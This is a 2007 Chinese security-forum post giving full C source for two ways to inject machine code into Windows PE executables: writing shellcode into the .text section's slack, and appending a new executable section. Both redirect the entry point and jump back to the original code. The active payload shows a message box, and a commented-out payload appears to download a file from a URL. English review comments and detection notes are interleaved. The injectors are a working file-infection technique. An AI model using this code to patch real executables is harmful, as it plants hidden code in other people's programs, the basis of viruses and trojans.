
x14oh4o 2007-10-31 18:47

[原创]两种方式实现注入机器码

文章作者:小浩
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])

PE插缝:
[code]
//by 小浩 Q82602935
#include "stdafx.h"
#include <io.h>
#include <sys\stat.h>
#include <fcntl.h>
#include <stdio.h>



// Offsets extracted from the target image by GetPeInfo() and consumed by
// WriteCodeTofile(). All values describe section_header[0] of the file,
// which GetPeInfo() requires to be the ".text" section.
typedef struct tagPeInfo
{
    DWORD dwPeNewEntryAddress;   // RVA that replaces AddressOfEntryPoint (= dwPeEntryoffset + dwPeCodeoffset)
    DWORD dwPeOldEntryAddress;   // original AddressOfEntryPoint (OEP), the payload jumps back to it
    DWORD dwPePhysicalSize;      // section_header[0].SizeOfRawData
    DWORD dwPePhysicalAddress;   // section_header[0].PointerToRawData (file offset of the raw data)
    DWORD dwPeVirtualSize;       // section_header[0].Misc.VirtualSize (bytes actually used)
    DWORD dwPeAddress;           // IMAGE_DOS_HEADER::e_lfanew (file offset of the NT headers)
    DWORD dwPegapsize;           // SizeOfRawData - VirtualSize: slack at the end of the section's raw data
    DWORD dwPeCodeoffset;        // BaseOfCode - PointerToRawData: delta between code RVA and file offset
    DWORD dwPeEntryoffset;       // file offset where the payload is written (end of used bytes, rounded up to 16)
}PeInfo,*PPeInfo;


// Overlay laid over the mapped file at e_lfanew so the NT headers and the
// start of the section table can be addressed through one pointer.
// IMAGE_OPTIONAL_HEADER resolves to the 32- or 64-bit variant of the build's
// SDK headers; the "+40" entry-point offset used in WriteCodeTofile() only
// matches the 32-bit layout.
typedef struct PE_HEADER_MAP
{
    DWORD Signature;                           // "PE\0\0" (IMAGE_NT_SIGNATURE)
    IMAGE_FILE_HEADER _head;
    IMAGE_OPTIONAL_HEADER opt_head;
    IMAGE_SECTION_HEADER section_header[6];    // fixed count; GetPeInfo() only ever reads [0],
                                               // NumberOfSections is not consulted
}peHeader;



/*unsigned char szHexCode[] = {0x6A ,0x40 ,0xE8 ,0x15 ,0x00 ,0x00 ,0x00 ,0xCE ,0xDE ,0xCC,
0xF5 ,0xBC ,0xFE ,0xCE ,0xAA ,0xC4 ,0xE3 ,0xA3 ,0xAC ,0xBB,
0xB6 ,0xD3 ,0xAD ,0xC4 ,0xFA ,0xA3 ,0xA1 ,0x00 ,0xE8 ,0x06 ,
0x00 ,0x00 ,0x00 ,0x68 ,0x65 ,0x6C ,0x6C ,0x6F ,0x00 ,0x6A ,
0x00 ,0xB8 ,0x8A ,0x05 ,0xD5 ,0x77 ,0xFF ,0xD0 ,0xe9 ,0x00 ,
                                 0x00 ,0x00 ,0x00 };
*/
// Payload written into the target. This array is mutated at run time:
// WriteCodeTofile() overwrites indices 32..35 with the rel32 displacement
// back to the original entry point (the 4 bytes after the 0xe9 at index 31).
// NOTE(review): the bytes appear to embed an absolute API address (compare
// the commented-out GetProcAddress block in WriteCodeTofile) -- confirm; such
// an address is only valid for the exact library build it was taken from.
// Detection note: the constant prefix of this array is a usable static signature.
unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};

/*
/*unsigned char szHexCode[]={
0x8B,0xF4,0x68,0x30,0xF0,0x41,0x00,0xFF,0x15,0x3C,
0x41,0x42,0x00,0x3B,0xF4,0xE8,0xA4,0x00,0x00,0x00,
0x89,0x45,0xFC,0x8B,0xF4,0x68,0x1C,0xF0,0x41,0x00,
0x8B,0x45,0xFC,0x50,0xFF,0x15,0x38,0x41,0x42,0x00,
0x3B,0xF4,0xE8,0x89,0x00,0x00,0x00,0x89,0x45,0xF8,
0x6A,0x00,0x6A,0x00,0xE8,0x07,0x00,0x00,0x00,0x63,
0x3A,0x5C,0x31,0x2E,0x67,0x00,0xE8,0x22,0x00,0x00,
0x00,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,
0x77,0x2E,0x62,0x61,0x69,0x64,0x75,0x2E,0x63,0x6F,
0x6D,0x2F,0x69,0x6D,0x67,0x2F,0x6C,0x6F,0x67,0x6F,
0x2E,0x67,0x69,0x66,0x00,0x6A,0x00,0xF8,0xFF,0xD0,
0xe9,0x00,0x00,0x00,0x00};
*/


// Parses the DOS/NT headers of the image mapped at vBasepointer and fills
// *Peinfo with the offsets WriteCodeTofile() needs.
// Returns 1 on success; on any failed check shows a MessageBox and returns 0.
// Review notes:
//  - e_lfanew is never validated against the size of the mapping, so a
//    malformed file makes the peHeader overlay point outside the view.
//  - only section_header[0] is examined and it must be ".text"; the section
//    count in the file header is ignored.
//  - IMAGE_SECTION_HEADER::Name is an 8-byte field with no guaranteed NUL
//    terminator, so strstr() may read past it.
int GetPeInfo(void *vBasepointer,PPeInfo Peinfo)
{
  IMAGE_DOS_HEADER *iDosHeader=(IMAGE_DOS_HEADER*)vBasepointer;
  if(iDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)   // "MZ"
  {
      MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
      return 0;
  }

  peHeader *pEheader=(peHeader*)((char*)iDosHeader+iDosHeader->e_lfanew);
  if(pEheader->Signature!=IMAGE_NT_SIGNATURE)   // "PE\0\0"
  {
      MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
      return 0;
  }

  // Name is BYTE[8] and need not be NUL-terminated (see note above).
  char *szRet=strstr((const char*)pEheader->section_header[0].Name,".text");
  if(!szRet)
  {
      MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
      return 0;
  }
  
  Peinfo->dwPeAddress=iDosHeader->e_lfanew;

  Peinfo->dwPeVirtualSize=pEheader->section_header[0].Misc.VirtualSize;  // bytes of the section actually used
  
  Peinfo->dwPePhysicalAddress=pEheader->section_header[0].PointerToRawData;  // file offset of the raw data

  Peinfo->dwPePhysicalSize=pEheader->section_header[0].SizeOfRawData;   // size of the raw data in the file

  // Slack between the used bytes and the end of the raw data. Unsigned
  // subtraction: if VirtualSize > SizeOfRawData (legal when the loader
  // zero-fills the tail) this wraps to a huge value, and the size check in
  // InjectCodeToFile() no longer protects anything.
  Peinfo->dwPegapsize=Peinfo->dwPePhysicalSize
      -Peinfo->dwPeVirtualSize;            // gap size

  // Delta between the code section's RVA and its file offset. This assumes
  // BaseOfCode is the RVA of section_header[0]; it is not verified here.
  Peinfo->dwPeCodeoffset=pEheader->opt_head.BaseOfCode
      -Peinfo->dwPePhysicalAddress;               // (RVA of code in memory) - (file offset of code)

  Peinfo->dwPeEntryoffset=pEheader->section_header[0].PointerToRawData
      +pEheader->section_header[0].Misc.VirtualSize;  // file offset where the payload is written
  
  // Round the write offset up to the next multiple of 16.
  DWORD dwMods=Peinfo->dwPeEntryoffset%16;
  if(dwMods!=0)
  {
      Peinfo->dwPeEntryoffset+=(16-dwMods);
  }

  Peinfo->dwPeOldEntryAddress=pEheader->opt_head.AddressOfEntryPoint; //OEP
  Peinfo->dwPeNewEntryAddress=Peinfo->dwPeEntryoffset+Peinfo->dwPeCodeoffset; // new entry point RVA
  return 1;
}

// Packs dwAddress into 4 little-endian bytes and returns them wrapped in a
// CString; callers read the bytes back with GetAt(0..3) or memcpy().
// NOTE(review): waddress is not NUL-terminated and the implicit CString
// conversion treats it as a C string -- a value containing a 0x00 byte is
// truncated at that byte, and a value with no 0x00 byte is read past the
// end of the array. Any GetAt(i) past the truncated length is invalid.
CString StrOfDWord(DWORD dwAddress)
{
    unsigned char waddress[4]={0};
   
    // The (char) cast binds tighter than "& 0xFF"; the mask changes nothing
    // once the result is stored into an unsigned char.
    waddress[3]=(char)(dwAddress>>24)&0xFF;
    waddress[2]=(char)(dwAddress>>16)&0xFF;
    waddress[1]=(char)(dwAddress>>8 )&0xFF;
    waddress[0]=(char)(dwAddress  )&0xFF;
   
    return waddress;
}

// Patches the file at szFilePath in place using the offsets in *Peinfo:
//   1. overwrites AddressOfEntryPoint -- at e_lfanew + 40, i.e. offset 16
//      of the 32-bit optional header -- with dwPeNewEntryAddress;
//   2. fixes up the last 4 bytes of the global szHexCode with the rel32
//      displacement from the end of the payload back to the original OEP;
//   3. writes szHexCode at file offset dwPeEntryoffset.
// Returns 1 on success, 0 after a MessageBox on failure.
// Review notes:
//  - _open() returns -1 on failure and 0 is a valid descriptor, so
//    "if(!nRet)" tests the wrong value.
//  - every early return leaves the descriptor open.
//  - the "+40" offset is only correct for a 32-bit optional header.
//  - szHexCode is global state and is modified here.
int WriteCodeTofile(char szFilePath[],PPeInfo Peinfo)
{

  int nTolen=sizeof(szHexCode);
  

  DWORD dwRet;
  int nRet=_open(szFilePath,_O_RDWR | _O_CREAT | _O_BINARY,_S_IREAD | _S_IWRITE);
  if(!nRet)   // wrong test: failure is -1, and 0 is a valid descriptor
  {
    MessageBox(NULL,"_open Error!","_open Error!",NULL);
    return 0;
  }
  
  // e_lfanew + 40 = AddressOfEntryPoint in IMAGE_NT_HEADERS32.
  dwRet=_lseek(nRet,(long)Peinfo->dwPeAddress+40,SEEK_SET);
  if(dwRet==-1)   // DWORD compared with -1: works through the implicit conversion
  {
    MessageBox(NULL,"_lseek Error!","_lseek Error!",NULL);
    return 0;
  }

      char szWaddress[4]={0};
  // The CString returned by StrOfDWord() stops at the first 0x00 byte of the
  // address, so fewer than 4 valid bytes may be behind this pointer.
  memcpy(szWaddress,StrOfDWord(Peinfo->dwPeNewEntryAddress),4);
  
    dwRet=_write(nRet,szWaddress,4);
      if(dwRet==-1)
  {
        MessageBox(NULL,"_write Error!","_write Error!",NULL);
        return 0;
  }

/*    CString szMsgA;
    DWORD dwMessageBoxAadaddress;
      HINSTANCE gLibMsg=LoadLibrary("user32.dll");
    dwMessageBoxAadaddress=(DWORD)GetProcAddress(gLibMsg,"MessageBoxA");
      szMsgA=StrOfDWord(dwMessageBoxAadaddress);
*/
    CString szOepA;
    DWORD dwAddress;
    // Displacement from the byte after the payload (new entry + nTolen) back
    // to the original entry point; written as a little-endian rel32.
    dwAddress = 0-(Peinfo->dwPeNewEntryAddress
        -Peinfo->dwPeOldEntryAddress+nTolen);
    szOepA=StrOfDWord(dwAddress);

    // Patch the 4 bytes following the 0xe9 at index 31. GetAt(i) is only
    // valid while i is below the CString's length (see StrOfDWord note).
    for(int i=0;i<4;i++)
    {
        szHexCode[32+i]=szOepA.GetAt(i);
    }

    dwRet=_lseek(nRet,(long)Peinfo->dwPeEntryoffset,SEEK_SET);
    if(dwRet==-1)
    {
        MessageBox(NULL,"_lseek Error!","_lseek Error!",NULL);
        return 0;
    }

    // Partial writes are not distinguished from full ones (only -1 is checked).
    dwRet=_write(nRet,szHexCode,nTolen);
      if(dwRet==-1)
  {
        MessageBox(NULL,"_write Error!","_write Error!",NULL);
        return 0;
  }

    _close(nRet);
    return 1;
}


// Maps szFilePath read-only, extracts the offsets with GetPeInfo(), checks
// that the slack after section 0 can hold szHexCode, then patches the file
// through WriteCodeTofile(). Returns 1 on success, 0 after a MessageBox.
// Review notes:
//  - hFile is not closed when CreateFileMapping()/MapViewOfFile() fail, and
//    the view is not unmapped when GetPeInfo() fails.
//  - the mapping is not size-checked, so GetPeInfo() may read past the view
//    on a truncated file.
//  - the return value of WriteCodeTofile() is ignored; 1 is returned even
//    when nothing was written.
// Detection note: the result is an entry point that lies past
// section 0's VirtualSize, inside its raw-data slack -- an entry point
// outside every section's [VirtualAddress, VirtualAddress+VirtualSize)
// range is a common indicator for this technique.
int InjectCodeToFile(char szFilePath[])
{
  HANDLE hFile=CreateFile(szFilePath,GENERIC_READ|GENERIC_WRITE,
      FILE_SHARE_READ|FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_FLAG_SEQUENTIAL_SCAN,0);
  if(hFile==INVALID_HANDLE_VALUE)
  {
      MessageBox(NULL,"CreateFile Error!","CreateFile Error!",NULL);
      return 0;
  }

  HANDLE hMapping=CreateFileMapping(hFile,0,PAGE_READONLY | SEC_COMMIT,0,0,0);
  if(!hMapping)   // hFile leaks on this path
  {
      MessageBox(NULL,"CreateFileMapping Error!","CreateFileMapping Error!",NULL);
      return 0;
  }

  void *vBasepointer=MapViewOfFile(hMapping,FILE_MAP_READ,0,0,0);
  if(!vBasepointer)   // hFile and hMapping leak on this path
  {
      MessageBox(NULL,"MapViewOfFile Error!","MapViewOfFile Error!",NULL);
      return 0;
  }

  // Closing both handles here is fine: the view stays valid until
  // UnmapViewOfFile().
  CloseHandle(hFile);
  CloseHandle(hMapping);
  
  PeInfo pEinfo;
  int nRet=GetPeInfo(vBasepointer,&pEinfo);
  if(!nRet)   // view is not unmapped on this path
  return 0;
  UnmapViewOfFile(vBasepointer);
  
  // dwPegapsize is an unsigned difference computed in GetPeInfo(); when it
  // has wrapped this comparison passes for any payload size.
  if(pEinfo.dwPegapsize<sizeof(szHexCode))
  {
      MessageBox(NULL,"No room to write the data!","No room to write the data!",NULL);
      return 0;
  }

  WriteCodeTofile(szFilePath,&pEinfo);   // return value ignored

  return 1;
}



// Entry point: reads a path from stdin, copies the file to "<path>.bak",
// then patches the original through InjectCodeToFile().
// Review notes:
//  - scanf("%s") has no width limit, so input longer than MAX_PATH-1
//    overruns szFilePath; "&szFilePath" is a char(*)[MAX_PATH], not the
//    char* that %s expects.
//  - lstrcat() of ".bak" can overrun szFileBak when the path is already
//    close to MAX_PATH.
//  - the results of CopyFile() and InjectCodeToFile() are ignored.
//  - "void main" is non-standard.
void main()
{
    char szFilePath[MAX_PATH];
    printf("Please Input File Path:");
    scanf("%s",&szFilePath);   // unbounded read into a MAX_PATH buffer

    char szFileBak[MAX_PATH];
    lstrcpy(szFileBak,szFilePath);
  lstrcat(szFileBak,".bak");   // no room check before appending
    CopyFile(szFilePath,szFileBak,FALSE);   // return value ignored



    InjectCodeToFile(szFilePath);   // return value ignored
}
[/code]


PE添节:
[code]
//转载请注明 By 小浩 QQ:82602935
#include <afx.h>
#include <stdio.h>
#include <assert.h>


// Payload written into the new section. This array is mutated at run time:
// main() overwrites indices 32..35 with the rel32 displacement back to the
// original entry point (the 4 bytes after the 0xe9 at index 31).
// NOTE(review): the bytes appear to embed an absolute API address -- confirm;
// such an address is only valid for the exact library build it was taken from.
// Detection note: the constant prefix of this array is a usable static signature.
unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
  0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};


// Packs dwAddress into 4 little-endian bytes and returns them wrapped in a
// CString; main() reads the bytes back with GetAt(0..3).
// NOTE(review): waddress is not NUL-terminated and the implicit CString
// conversion treats it as a C string -- a value containing a 0x00 byte is
// truncated at that byte, and a value with no 0x00 byte is read past the
// end of the array. Any GetAt(i) past the truncated length is invalid.
CString StrOfDWord(DWORD dwAddress)
{
    unsigned char waddress[4]={0};
   
    // The (char) cast binds tighter than "& 0xFF"; the mask changes nothing
    // once the result is stored into an unsigned char.
    waddress[3]=(char)(dwAddress>>24)&0xFF;
    waddress[2]=(char)(dwAddress>>16)&0xFF;
    waddress[1]=(char)(dwAddress>>8 )&0xFF;
    waddress[0]=(char)(dwAddress  )&0xFF;
   
    return waddress;
}


// Rounds size up to the next multiple of ALIGN_BASE; a size that is already
// a multiple is returned unchanged. ALIGN_BASE must be non-zero (asserted).
// Uses C division semantics, so the result for negative sizes follows the
// sign rules of "/" and "%".
int Align(int size, int ALIGN_BASE)
{
    assert( 0 != ALIGN_BASE );

    int remainder = size % ALIGN_BASE;
    if (remainder == 0)
    {
        return size;   // already aligned
    }

    // Drop the partial block and add one whole one.
    return (size / ALIGN_BASE + 1) * ALIGN_BASE;
}

// Entry point: backs up the input file to "<path>.bak", then appends a new
// section named ".x4h" to the PE: a section header is written after the
// existing section table, the NT headers are rewritten with the bumped
// section count / sizes / entry point, the file is padded with zeros and
// the payload is written at the new section's PointerToRawData.
// Review notes:
//  - scanf("%s") is unbounded (overrun of szFilePath) and "&szFilePath" is
//    not the char* that %s expects.
//  - every early return after fopen() leaks pFile; no fread()/fwrite()/fclose()
//    result is checked.
//  - IMAGE_NT_HEADERS is the 32- or 64-bit variant of the build's SDK; the
//    field reads below assume the layout the program was compiled against.
//  - the new header is written at the end of the section table without
//    checking that SizeOfHeaders leaves room for it; it may land on the
//    data that follows the table.
//  - the last header read from the table is taken as the last section in
//    both RVA and file order, and the file is assumed to have no overlay.
//  - the loop variable i declared in the first for() is reused later; that
//    relies on the old MSVC for-scope rule and is not valid standard C++.
// Detection note: the file ends up with a last section named ".x4h",
// Characteristics 0xE0000020 (code | execute | read | write), the entry
// point inside that section and an empty bound-import directory.
void main()
{
    char szFilePath[MAX_PATH]={0};
    printf("Please Input FilePath:");
    scanf("%s",&szFilePath);   // unbounded read into a MAX_PATH buffer
   
    char szFilaBak[MAX_PATH]={0};
    lstrcpy(szFilaBak,szFilePath);
    lstrcat(szFilaBak,".bak");   // no room check before appending
  int nRet=CopyFile(szFilePath,szFilaBak,FALSE);
  if(!nRet)
    {
        printf("CopyFile Error!\r\n");
        return;
    }

    FILE *pFile;
    pFile=fopen(szFilePath,"rb+");
    if(pFile==NULL)
    {
        printf("fopen Error!\r\n");
        return;
    }
    fseek(pFile,0,SEEK_SET);

  IMAGE_DOS_HEADER iMageDosHeader;
    fread(&iMageDosHeader,sizeof(IMAGE_DOS_HEADER),1,pFile);   // result unchecked
  if(iMageDosHeader.e_magic!=IMAGE_DOS_SIGNATURE)   // "MZ"
    {
        printf("Unknown type of file!\r\n");
        return;   // pFile leaks
    }
    fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);   // e_lfanew not range-checked

    IMAGE_NT_HEADERS iMageNtHeaders;
    fread(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);   // result unchecked
    if(iMageNtHeaders.Signature!=IMAGE_NT_SIGNATURE)   // "PE\0\0"
    {
        printf("Unknown type of file!\r\n");
        return;   // pFile leaks
    }

    int nNumOfSections=iMageNtHeaders.FileHeader.NumberOfSections;
  printf("%d Segment\r\n",nNumOfSections);

    int nFileAlignMent,nSectionAlignMent;
    nFileAlignMent=iMageNtHeaders.OptionalHeader.FileAlignment;
    nSectionAlignMent=iMageNtHeaders.OptionalHeader.SectionAlignment;
  printf("File Align Ment:%x\r\n",nFileAlignMent);
  printf("Section Align Ment:%x\r\n",nSectionAlignMent);

    DWORD dwOldOEP=iMageNtHeaders.OptionalHeader.AddressOfEntryPoint;
  printf("File OEP:%08x\r\n",dwOldOEP);

    // Walk the section table; after the loop iMageSectionHeader holds the
    // LAST header read, which the code below treats as the last section.
    // Name is BYTE[8] without a guaranteed NUL, so "%s" may read past it.
    IMAGE_SECTION_HEADER iMageSectionHeader;
    for(int i=0;i<nNumOfSections;i++)
    {
        fread(&iMageSectionHeader,sizeof(IMAGE_SECTION_HEADER),1,pFile);
        printf("Segment name:%s\r\n",iMageSectionHeader.Name);
    }

    IMAGE_SECTION_HEADER iMageNewSection;
    memset(&iMageNewSection,0,sizeof(IMAGE_SECTION_HEADER));

    // Name was zeroed by the memset above, so the 4-byte strncpy leaves it
    // NUL-terminated within the 8-byte field.
    strncpy((char*)iMageNewSection.Name,".x4h",strlen(".x4h"));
    // New RVA: end of the last section's used bytes, rounded to SectionAlignment.
  iMageNewSection.VirtualAddress=Align(iMageSectionHeader.VirtualAddress
        +iMageSectionHeader.Misc.VirtualSize,nSectionAlignMent);

    int extraLengthAfterAlign=Align(30,nFileAlignMent);   // 30 is a magic number; it does not match sizeof(szHexCode)

    iMageNewSection.Misc.VirtualSize=Align(extraLengthAfterAlign,nSectionAlignMent);

    // New raw offset: end of the last section's raw data, rounded to
    // FileAlignment. This equals the current end of file only when there
    // is no overlay and the last header is also last in file order.
    iMageNewSection.PointerToRawData=Align(iMageSectionHeader.PointerToRawData
        +iMageSectionHeader.SizeOfRawData,nFileAlignMent);

    // Raw size is fixed at 0x1000 regardless of the VirtualSize chosen above.
    iMageNewSection.SizeOfRawData=Align(0x1000,nFileAlignMent);

    // IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    iMageNewSection.Characteristics=0xE0000020;
   
      iMageNtHeaders.FileHeader.NumberOfSections++;

    iMageNtHeaders.OptionalHeader.SizeOfCode=Align(iMageNtHeaders.OptionalHeader.SizeOfCode
        +0x1000,nFileAlignMent);

    // SizeOfImage grows by an aligned 0x1000, not by the VirtualSize set above.
    iMageNtHeaders.OptionalHeader.SizeOfImage=iMageNtHeaders.OptionalHeader.SizeOfImage
        +Align(0x1000,nSectionAlignMent);

    // The bound-import directory is cleared; presumably because it commonly
    // sits right after the section table, where the new header is written.
    iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
    iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
    iMageNtHeaders.OptionalHeader.AddressOfEntryPoint=iMageNewSection.VirtualAddress;

    fseek(pFile,0,SEEK_END);   // redundant: the next fseek repositions absolutely
    // Append the new header directly after the existing section table.
    // No check that this offset is still inside SizeOfHeaders.
    fseek(pFile,iMageDosHeader.e_lfanew+sizeof(IMAGE_NT_HEADERS)
        +nNumOfSections*sizeof(IMAGE_SECTION_HEADER),SEEK_SET);
  fwrite(&iMageNewSection,sizeof(IMAGE_SECTION_HEADER),1,pFile);   // result unchecked

    fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);
    fwrite(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);   // result unchecked
  
    fseek(pFile,0,SEEK_END);
   
    CString szOepA;
    DWORD dwAddress;
    // Displacement from the byte after the payload (new RVA + payload size)
    // back to the original entry point; written as a little-endian rel32.
    dwAddress = 0-(iMageNewSection.VirtualAddress-dwOldOEP+sizeof(szHexCode));
    szOepA=StrOfDWord(dwAddress);
    // Patch the 4 bytes after the 0xe9 at index 31. GetAt(i) is only valid
    // while i is below the CString's length (see StrOfDWord note).
    for(i=0;i<4;i++)   // i reused from the for() above (old MSVC scoping)
    {
      szHexCode[32+i]=szOepA.GetAt(i);
    }

    // Pad the file with one aligned 0x1000 block of zeros at the current EOF.
    for (i=0; i<Align(0x1000,nFileAlignMent);i++)
    {
        fputc(0,pFile);
    }
    // Then overwrite the start of the new section's raw data with the payload.
    fseek(pFile,iMageNewSection.PointerToRawData,SEEK_SET);
    for (i=0; i<sizeof(szHexCode);i++)   // signed/unsigned comparison
    {
        fputc(szHexCode[i],pFile);
    }
    fclose(pFile);   // result unchecked on a write stream



}
[/code]

产生呕吐,板砖效应一概不负责[s:264][s:287]
